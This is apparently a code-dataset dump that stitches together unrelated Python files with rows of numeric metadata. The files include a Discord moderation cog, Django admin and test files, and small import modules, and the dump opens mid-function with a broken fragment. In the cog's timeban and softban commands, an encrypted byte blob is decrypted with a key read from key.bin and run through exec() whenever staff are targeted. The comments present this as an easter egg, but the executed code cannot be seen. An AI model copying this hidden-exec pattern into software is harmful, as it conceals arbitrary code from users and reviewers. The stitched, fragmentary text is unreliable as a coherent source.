cipher = pyaes.AESModeOfOperationCTR(key[::-1])
exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
await func[0]
return
self.bot.actions.append("ub:"+member.id)
await self.bot.ban(member, 0)
await self.bot.say("{} is now b&. 👍".format(self.bot.escape_name(member)))
msg = "⛔ **Silent ban**: {} banned {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id)
if reason != "":
msg += "\n✏️ __Reason__: " + reason
await self.bot.send_message(self.bot.serverlogs_channel, msg)
await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.silentban <user> [reason]`." if reason == "" else ""))
except discord.errors.Forbidden:
await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="timeban")
async def timeban_member(self, ctx, user, length, *, reason=""):
    """Bans a user for a limited period of time. OP+ only.\n\nLength format: #d#h#m#s"""
    # `user` only exists so the mention is consumed from the invocation; the
    # actual target is resolved from the message's mention list.
    try:
        member = ctx.message.mentions[0]
    except IndexError:
        await self.bot.say("Please mention a user.")
        return
    if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
        # Staff/helper targets trigger an encrypted easter egg instead of a ban.
        # SECURITY NOTE(review): this decrypts and exec()s an AES-CTR payload
        # keyed by key.bin. exec of decrypted data is dangerous in general;
        # the payload handling below is kept byte-identical on purpose.
        enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
        with open("key.bin", "rb") as f:
            key = f.read(0x20)
        cipher = pyaes.AESModeOfOperationCTR(key)
        await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
        # shitty hack but it works
        lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
                 b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
                 b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
                 b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
                 b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
                 b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
                 b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
                 b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
                 b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
                 b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
        func = []
        cipher = pyaes.AESModeOfOperationCTR(key[::-1])
        exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
        await func[0]
        return
    # thanks Luc#5653
    units = {
        "d": 86400,
        "h": 3600,
        "m": 60,
        "s": 1
    }
    seconds = 0
    match = re.findall("([0-9]+[smhd])", length)  # Thanks to 3dshax server's former bot
    # BUGFIX: re.findall always returns a list (never None), so the previous
    # `if match is None` check could never fire and a malformed length string
    # slipped through with seconds == 0. Bail out on an empty match list.
    if not match:
        return
    for item in match:
        seconds += int(item[:-1]) * units[item[-1]]
    timestamp = datetime.datetime.now()
    delta = datetime.timedelta(seconds=seconds)
    unban_time = timestamp + delta
    unban_time_string = unban_time.strftime("%Y-%m-%d %H:%M:%S")
    # Persist the timed ban so it survives bot restarts, and mirror it in the
    # in-memory table that the unban scheduler reads.
    with open("data/timebans.json", "r") as f:
        timebans = json.load(f)
    timebans[member.id] = unban_time_string
    self.bot.timebans[member.id] = [member, unban_time, False]  # last variable is "notified", for <=30 minute notifications
    with open("data/timebans.json", "w") as f:
        json.dump(timebans, f)
    msg = "You were banned from {}.".format(self.bot.server.name)
    if reason != "":
        msg += " The given reason is: " + reason
    msg += "\n\nThis ban expires {} {}.".format(unban_time_string, time.tzname[0])
    try:
        await self.bot.send_message(member, msg)
    except discord.errors.Forbidden:
        pass  # don't fail in case user has DMs disabled for this server, or blocked the bot
    # Tag the pending ban so the on-ban event handler knows it is bot-issued.
    self.bot.actions.append("ub:"+member.id)
    await self.bot.ban(member, 0)
    await self.bot.say("{} is now b& until {} {}. 👍".format(self.bot.escape_name(member), unban_time_string, time.tzname[0]))
    msg = "⛔ **Time ban**: {} banned {} until {} | {}#{}\n🏷 __User ID__: {}".format(ctx.message.author.mention, member.mention, unban_time_string, self.bot.escape_name(member.name), member.discriminator, member.id)
    if reason != "":
        msg += "\n✏️ __Reason__: " + reason
    await self.bot.send_message(self.bot.serverlogs_channel, msg)
    await self.bot.send_message(self.bot.modlogs_channel, msg + ("\nPlease add an explanation below. In the future, it is recommended to use `.timeban <user> <length> [reason]` as the reason is automatically sent to the user." if reason == "" else ""))
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="softban")
async def softban_member(self, ctx, user, *, reason):
    """Soft-ban a user. OP+ only.\n\nThis "bans" the user without actually doing a ban on Discord. The bot will instead kick the user every time they join. Discord bans are account- and IP-based."""
    try:
        # `user` only exists so the mention is consumed; resolve the real
        # target from the message's mention list.
        try:
            member = ctx.message.mentions[0]
        except IndexError:
            await self.bot.say("Please mention a user.")
            return
        if self.bot.staff_role in member.roles or self.bot.helpers_role in member.roles:
            # Staff/helper targets trigger an encrypted easter egg instead of
            # a soft-ban. SECURITY NOTE(review): decrypts and exec()s an
            # AES-CTR payload keyed by key.bin; kept byte-identical on purpose.
            enc = b'; \xed\x01\xea\x911\xa5\'\xd7\x14a\xabo\xd4B\xbb\x1c0+X"|\xdeL\xf2\xee#/P\x07\xee\xf9\xdd\xf3\x98#N\xc1:\xaf\xe2a\xd6P\x10M\x17&0\x176!\xcfKa\xe4\xf2\xb9v:\x95-t\x16LhrY\xdeh\x14U\xf0\xfe\x08\x96\x83\x876!\x1a\xfc\x0b\xc5\x1a\x8b\x0e\x06\xcc\xbb'
            with open("key.bin", "rb") as f:
                key = f.read(0x20)
            cipher = pyaes.AESModeOfOperationCTR(key)
            await self.bot.say(cipher.decrypt(enc[::-1]).decode('utf-8'))
            # shitty hack but it works
            lenny = (b'\xc7n\xc65Ye\xa79(\xd7\xcb\xb89\x18\x84\xe5\\5\x86\xf5{I\x96\xc9'
                     b'\x88\x17m\xa8\xbd\x16\r5y\xacD)7C\xb3\xces\x0cW\x90!7;\xf6"\xb4\xf8\t'
                     b'\xe5J\xfe\x1b8U\xc6j\x1c\xfb8\xd0\xba8\xf2\x90%\x17\xa5\x87\xa3\xf9\xfb\xf2'
                     b'\x9f*\x7ff\x82D\xfc\xd2\xed\xc1\x15\xe0Y\xe9\x8f$|h\xb23\x10\xec\x84='
                     b'\rT\x05\x99\x82\xa9\xbf\x90;\\\xad\xce\x1dd\x99\x9b\x90lW\xfc\xf1G\xde\xd6'
                     b'\x91v=\xf0\xda\xefr\xae H\xe0(\xc6I\xdcNo\x9fS\xf7z\xff\xdb\xe6\xca\xf8A\xec'
                     b'\xb9\xef\x06a\xd9@H\x88\xb6\xa5E\x18Y\x9a\x1e\xa8:\x02\xdf\x19~\xa9\x93"'
                     b'Mg\xcc\x91D\xd8\x0c\xf0\x8fp\xf0\xb5\x16\\f\xbb\x87\x8e/\xfe\x82W\xce%'
                     b'\x9e\xab\xfb\xfa\x02\xf2~\xcev4\x07Y\xc9\xa2\xb1(\t[\x12r\x98\x83E\xc8'
                     b'\xaf\xab7h\x08\x99FBP\x14\xdc\xb0$N\x1f\xd8\xd7P')
            func = []
            cipher = pyaes.AESModeOfOperationCTR(key[::-1])
            exec(cipher.decrypt(lenny)[::-1].decode('utf-8'), globals(), locals())
            await func[0]
            return
        issuer = ctx.message.author
        with open("data/softbans.json", "r") as f:
            softbans = json.load(f)
        # Record (or overwrite) the soft-ban entry for this user. The old
        # `softbans[member.id] = {}` pre-initialization was dead code since
        # the entry is assigned unconditionally right here.
        timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        softbans[member.id] = {"name": "{}#{}".format(member.name, member.discriminator), "issuer_id": issuer.id, "issuer_name": issuer.name, "reason": reason, "timestamp": timestamp}
        with open("data/softbans.json", "w") as f:
            json.dump(softbans, f)
        msg = "This account is no longer permitted to participate in {}. The reason is: {}".format(self.bot.server.name, softbans[member.id]["reason"])
        # BUGFIX: guard the DM individually (as timeban does). Previously a
        # target with DMs disabled or the bot blocked raised Forbidden here,
        # the outer handler reported a permission error, and the kick below
        # never happened — so the soft-ban silently failed.
        try:
            await self.bot.send_message(member, msg)
        except discord.errors.Forbidden:
            pass  # don't fail in case user has DMs disabled for this server, or blocked the bot
        await self.bot.kick(member)
        await self.bot.say("{} is now b&. 👍".format(self.bot.escape_name(member)))
        msg = "⛔ **Soft-ban**: {} soft-banned {} | {}#{}\n🏷 __User ID__: {}\n✏️ __Reason__: {}".format(ctx.message.author.mention, member.mention, self.bot.escape_name(member.name), member.discriminator, member.id, reason)
        await self.bot.send_message(self.bot.modlogs_channel, msg)
        await self.bot.send_message(self.bot.serverlogs_channel, msg)
    except discord.errors.Forbidden:
        await self.bot.say("💢 I don't have permission to do this.")
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="softbanid")
async def softbanid_member(self, ctx, user_id, *, reason):
    """Soft-ban a user based on ID. OP+ only.\n\nThis "bans" the user without actually doing a ban on Discord. The bot will instead kick the user every time they join. Discord bans are account- and IP-based."""
    issuer = ctx.message.author
    with open("data/softbans.json", "r") as f:
        softbans = json.load(f)
    # Keep a previously-resolved name for this ID; fall back to the "???"
    # placeholder when the ID was never seen (or never resolved) before.
    # This also replaces the old dead `softbans[user_id] = {}` init (the
    # entry was always overwritten below) and avoids a KeyError if a stored
    # entry somehow lacks a "name" field.
    name = softbans.get(user_id, {}).get("name", "???")
    timestamp = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
    softbans[user_id] = {"name": name, "issuer_id": issuer.id, "issuer_name": issuer.name, "reason": reason, "timestamp": timestamp}
    with open("data/softbans.json", "w") as f:
        json.dump(softbans, f)
    await self.bot.say("ID {} is now b&. 👍".format(user_id))
    msg = "⛔ **Soft-ban**: {} soft-banned ID {}\n✏️ __Reason__: {}".format(ctx.message.author.mention, user_id, reason)
    await self.bot.send_message(self.bot.modlogs_channel, msg)
    await self.bot.send_message(self.bot.serverlogs_channel, msg)
@commands.has_permissions(ban_members=True)
@commands.command(pass_context=True, name="unsoftban")
async def unsoftban_member(self, ctx, user_id):
    """Un-soft-ban a user based on ID. OP+ only."""
    # BUGFIX: this docstring used to sit *after* the first statement, which
    # made it a bare string expression — it was never picked up as the
    # function docstring (i.e. the command's help text).
    issuer = ctx.message.author
    with open("data/softbans.json", "r") as f:
        softbans = json.load(f)
    if user_id not in softbans:
        await self.bot.say("{} is not soft-banned!".format(user_id))
        return
    # Remove the entry, remembering the stored display name for the logs.
    name = softbans.pop(user_id)["name"]
    with open("data/softbans.json", "w") as f:
        json.dump(softbans, f)
    await self.bot.say("{} has been unbanned!".format(self.bot.escape_name(name) if name != "???" else user_id))
    msg = "⚠️ **Un-soft-ban**: {} un-soft-banned {}".format(issuer.mention, self.bot.escape_name(name) if name != "???" else "ID {}".format(user_id))
    await self.bot.send_message(self.bot.modlogs_channel, msg)
@commands.has_permissions(manage_nicknames=True)
@commands.command()
async def listsoftbans(self, user_id=""):
    """List soft bans. Shows all if an ID is not specified."""
    with open("data/softbans.json", "r") as f:
        softbans = json.load(f)
    embed = discord.Embed(color=discord.Color.dark_red())
    if user_id == "":
        embed.title = "All soft bans"
        for uid in softbans:
            embed.add_field(
                name=self._softban_title(softbans, uid),
                value=self._softban_details(softbans, uid)
            )
    elif user_id in softbans:
        embed.title = self._softban_title(softbans, user_id)
        embed.description = self._softban_details(softbans, user_id)
    else:
        embed.color = discord.Color.green()
        embed.title = user_id
        embed.description = "ID is not banned!"
    await self.bot.say(embed=embed)

def _softban_title(self, softbans, user_id):
    """Display title for one soft-ban entry: the stored name, or the raw ID when the name was never resolved ("???")."""
    entry = softbans[user_id]
    return self.bot.escape_name(entry["name"]) if entry["name"] != "???" else user_id

def _softban_details(self, softbans, user_id):
    """Issuer/time/reason details for one soft-ban entry; the ID line is included only when a real name is shown as the title."""
    entry = softbans[user_id]
    id_line = "" if entry["name"] == "???" else "ID: {}\n".format(user_id)
    return "{}Issuer: {}\nTime: {}\nReason: {}".format(
        id_line,
        self.bot.escape_name(entry["issuer_name"]),
        entry["timestamp"],
        entry["reason"]
    )
def setup(bot):
    """Extension entry point called by discord.py's loader: register the KickBan cog on *bot*."""
    cog = KickBan(bot)
    bot.add_cog(cog)
| 63.629834
| 270
| 0.573066
| 3,287
| 23,034
| 3.96836
| 0.131427
| 0.050981
| 0.041398
| 0.026449
| 0.853726
| 0.819227
| 0.795002
| 0.783349
| 0.765793
| 0.758203
| 0
| 0.069332
| 0.264869
| 23,034
| 361
| 271
| 63.806094
| 0.698931
| 0.022402
| 0
| 0.678679
| 0
| 0.15015
| 0.280471
| 0.162819
| 0
| 0
| 0.00092
| 0
| 0
| 1
| 0.006006
| false
| 0.03003
| 0.024024
| 0
| 0.069069
| 0.003003
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
13665e679c73c201198a789ddfd31eec3b55c213
| 98
|
py
|
Python
|
python/test/run_accuracy_tests.py
|
palmerb4/finufft
|
76f5d8cb688e71f9b80e76d2b13cb3a8a385580d
|
[
"Apache-2.0"
] | 4
|
2022-01-18T21:00:40.000Z
|
2022-02-28T19:12:53.000Z
|
python/test/run_accuracy_tests.py
|
palmerb4/finufft
|
76f5d8cb688e71f9b80e76d2b13cb3a8a385580d
|
[
"Apache-2.0"
] | null | null | null |
python/test/run_accuracy_tests.py
|
palmerb4/finufft
|
76f5d8cb688e71f9b80e76d2b13cb3a8a385580d
|
[
"Apache-2.0"
] | null | null | null |
from accuracy_speed_tests import accuracy_speed_tests
accuracy_speed_tests(100000, 100000, 1e-6)
| 24.5
| 53
| 0.867347
| 15
| 98
| 5.266667
| 0.533333
| 0.493671
| 0.683544
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 0.081633
| 98
| 3
| 54
| 32.666667
| 0.722222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
1374d85a043c0bbb61fa7f828bc19879ca7805a6
| 80
|
py
|
Python
|
src/gmcode/__init__.py
|
marcus7070/gmcode
|
b638e432098ffd9f792fc9fb01a208742d0cd5c4
|
[
"MIT"
] | null | null | null |
src/gmcode/__init__.py
|
marcus7070/gmcode
|
b638e432098ffd9f792fc9fb01a208742d0cd5c4
|
[
"MIT"
] | 2
|
2021-05-17T01:53:35.000Z
|
2021-05-29T05:35:25.000Z
|
src/gmcode/__init__.py
|
marcus7070/gmcode
|
b638e432098ffd9f792fc9fb01a208742d0cd5c4
|
[
"MIT"
] | null | null | null |
from gmcode.machine import Machine, MachineError
from gmcode.geom import Vector
| 26.666667
| 48
| 0.85
| 11
| 80
| 6.181818
| 0.636364
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.1125
| 80
| 2
| 49
| 40
| 0.957746
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13755885d23f6c93af6330aecaecdf34a140ae31
| 23
|
py
|
Python
|
maha/datasets/functions/__init__.py
|
MuhammadAlBarham/Maha
|
c28e0b7ca69942905548f013a1e35208ef8de7e7
|
[
"BSD-3-Clause"
] | 1
|
2021-11-02T08:25:12.000Z
|
2021-11-02T08:25:12.000Z
|
maha/datasets/functions/__init__.py
|
vikrambala/Maha
|
67020437e745b8fca4770186608326b81073d4b7
|
[
"BSD-3-Clause"
] | null | null | null |
maha/datasets/functions/__init__.py
|
vikrambala/Maha
|
67020437e745b8fca4770186608326b81073d4b7
|
[
"BSD-3-Clause"
] | null | null | null |
from .load_fn import *
| 11.5
| 22
| 0.73913
| 4
| 23
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 23
| 1
| 23
| 23
| 0.842105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13787a0037c74e71eac2f84521bfc4c0fdd8d044
| 44
|
py
|
Python
|
datasets/liver_utils.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/liver_utils.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
datasets/liver_utils.py
|
searobbersduck/FattyLiver_Solution
|
7b8542e70cdb4417889799ea6da2c794e9eae392
|
[
"MIT"
] | null | null | null |
import os
import sys
from glob import glob
| 8.8
| 21
| 0.795455
| 8
| 44
| 4.375
| 0.625
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.204545
| 44
| 4
| 22
| 11
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
138f10fa2b440d2e2b544a9d8b86983c0299f676
| 156
|
py
|
Python
|
utils/draw_net.py
|
lyzMaster/DeepGTA5-V2
|
f290e8957e1a0b6837cd391f110961a6cc97aa51
|
[
"MIT"
] | 12
|
2019-05-30T06:00:36.000Z
|
2022-02-24T18:08:15.000Z
|
utils/draw_net.py
|
HTL2018/DeepGTA5-V2
|
096f2fa1e991a68bf3d9243a310d9bd487740700
|
[
"MIT"
] | null | null | null |
utils/draw_net.py
|
HTL2018/DeepGTA5-V2
|
096f2fa1e991a68bf3d9243a310d9bd487740700
|
[
"MIT"
] | 6
|
2019-08-27T16:30:45.000Z
|
2021-12-27T03:45:19.000Z
|
from keras.utils import plot_model
from models.main_model import main_model
plot_model(main_model(), to_file='model.png', show_shapes=True) # 使用。。。画神经网络
| 31.2
| 78
| 0.788462
| 26
| 156
| 4.461538
| 0.615385
| 0.232759
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 156
| 4
| 79
| 39
| 0.828571
| 0.064103
| 0
| 0
| 0
| 0
| 0.0625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13970f8cf709cffa4e488754d74c8216e97aae51
| 22
|
py
|
Python
|
tests/fixtures/internal/subpackage_a/__init__.py
|
gitter-badger/dependenpy
|
db411b7bbd466b79064cbb419049f17cd3bff4c1
|
[
"ISC"
] | 10
|
2020-01-08T10:42:32.000Z
|
2021-07-08T01:58:08.000Z
|
tests/fixtures/internal/subpackage_a/__init__.py
|
gitter-badger/dependenpy
|
db411b7bbd466b79064cbb419049f17cd3bff4c1
|
[
"ISC"
] | 18
|
2015-03-13T11:55:49.000Z
|
2017-06-20T11:56:46.000Z
|
tests/fixtures/internal/subpackage_a/__init__.py
|
gitter-badger/dependenpy
|
db411b7bbd466b79064cbb419049f17cd3bff4c1
|
[
"ISC"
] | 1
|
2019-12-10T18:32:05.000Z
|
2019-12-10T18:32:05.000Z
|
import external as ex
| 11
| 21
| 0.818182
| 4
| 22
| 4.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 22
| 1
| 22
| 22
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
13f1d697b124d8055ddb23495d0a49267bde1ac7
| 2,559
|
py
|
Python
|
decisiontree/multitenancy/tests/test_utils.py
|
datamade/rapidsms-decisiontree-app
|
7613a43f1bb17ffcd6d5a5d6d6f93ad9c09bd2a6
|
[
"BSD-3-Clause"
] | 1
|
2018-08-23T06:29:23.000Z
|
2018-08-23T06:29:23.000Z
|
decisiontree/multitenancy/tests/test_utils.py
|
datamade/rapidsms-decisiontree-app
|
7613a43f1bb17ffcd6d5a5d6d6f93ad9c09bd2a6
|
[
"BSD-3-Clause"
] | 9
|
2018-08-07T20:37:52.000Z
|
2018-12-28T17:17:16.000Z
|
decisiontree/multitenancy/tests/test_utils.py
|
datamade/rapidsms-decisiontree-app
|
7613a43f1bb17ffcd6d5a5d6d6f93ad9c09bd2a6
|
[
"BSD-3-Clause"
] | null | null | null |
import mock
from django.test import TestCase
from .. import utils
@mock.patch('decisiontree.multitenancy.utils.multitenancy_enabled')
@mock.patch('decisiontree.multitenancy.utils.reverse')
class TestTenancyReverse(TestCase):
def setUp(self):
super(TestTenancyReverse, self).setUp()
self.request = mock.Mock(group_slug='group', tenant_slug='tenant')
def test_args_tenancy_enabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = True
val = utils.tenancy_reverse(self.request, 'test_url', 'a', 'b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': (self.request.group_slug, self.request.tenant_slug, 'a', 'b'),
'kwargs': {},
})
def test_args_tenancy_disabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = False
val = utils.tenancy_reverse(self.request, 'test_url', 'a', 'b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': ('a', 'b'),
'kwargs': {},
})
def test_kwargs_tenancy_enabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = True
val = utils.tenancy_reverse(self.request, 'test_url', a='a', b='b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': (),
'kwargs': {
'tenant_slug': self.request.tenant_slug,
'group_slug': self.request.group_slug,
'a': 'a',
'b': 'b',
},
})
def test_kwargs_tenancy_disabled(self, reverse, multitenancy_enabled):
multitenancy_enabled.return_value = False
val = utils.tenancy_reverse(self.request, 'test_url', a='a', b='b')
self.assertTrue(isinstance(val, mock.Mock))
self.assertTrue(reverse.call_count, 1)
self.assertEqual(reverse.call_args[0], ('test_url',))
self.assertEqual(reverse.call_args[1], {
'args': (),
'kwargs': {
'a': 'a',
'b': 'b',
},
})
| 38.19403
| 82
| 0.611567
| 287
| 2,559
| 5.254355
| 0.142857
| 0.087533
| 0.116711
| 0.137931
| 0.803714
| 0.700265
| 0.700265
| 0.700265
| 0.700265
| 0.700265
| 0
| 0.006218
| 0.245799
| 2,559
| 66
| 83
| 38.772727
| 0.77513
| 0
| 0
| 0.666667
| 0
| 0
| 0.096522
| 0.035561
| 0
| 0
| 0
| 0
| 0.280702
| 1
| 0.087719
| false
| 0
| 0.052632
| 0
| 0.157895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b91cfadb2c612b733dab1c074886d48c8a70f67b
| 176
|
py
|
Python
|
students/K33402/Puzyrev_Dmitry/practical_works/django_simple_app/practice3/django_project_puzyrev/project_first_app/admin.py
|
ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021
|
bb91c91a56d21cec2b12ae4cc722eaa652a88420
|
[
"MIT"
] | 4
|
2020-09-03T15:41:42.000Z
|
2021-12-24T15:28:20.000Z
|
students/K33402/Puzyrev_Dmitry/practical_works/django_simple_app/practice3/django_project_puzyrev/project_first_app/admin.py
|
ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021
|
bb91c91a56d21cec2b12ae4cc722eaa652a88420
|
[
"MIT"
] | 48
|
2020-09-13T20:22:42.000Z
|
2021-04-30T11:13:30.000Z
|
students/K33402/Puzyrev_Dmitry/practical_works/django_simple_app/practice3/django_project_puzyrev/project_first_app/admin.py
|
ShubhamKunal/ITMO_ICT_WebDevelopment_2020-2021
|
bb91c91a56d21cec2b12ae4cc722eaa652a88420
|
[
"MIT"
] | 69
|
2020-09-06T10:32:37.000Z
|
2021-11-28T18:13:17.000Z
|
from django.contrib import admin
from .models import *
admin.site.register(Driver)
admin.site.register(Car)
admin.site.register(Ownership)
admin.site.register(DrivingLicence)
| 22
| 35
| 0.818182
| 24
| 176
| 6
| 0.5
| 0.25
| 0.472222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073864
| 176
| 8
| 35
| 22
| 0.883436
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
b9425fee27fbae52100682df06aafebec462865a
| 114
|
py
|
Python
|
typecasts/__init__.py
|
python-platonic/typecasts
|
01deaadfdc7ee7312999104904f717f52013f143
|
[
"MIT"
] | 3
|
2020-10-05T17:26:54.000Z
|
2022-02-11T09:15:18.000Z
|
typecasts/__init__.py
|
python-platonic/typecasts
|
01deaadfdc7ee7312999104904f717f52013f143
|
[
"MIT"
] | 8
|
2020-10-02T06:29:20.000Z
|
2021-07-02T11:17:10.000Z
|
typecasts/__init__.py
|
python-platonic/typecasts
|
01deaadfdc7ee7312999104904f717f52013f143
|
[
"MIT"
] | null | null | null |
from typecasts.defaults import casts
from typecasts.identity import identity
from typecasts.main import Typecasts
| 28.5
| 39
| 0.868421
| 15
| 114
| 6.6
| 0.466667
| 0.393939
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.105263
| 114
| 3
| 40
| 38
| 0.970588
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
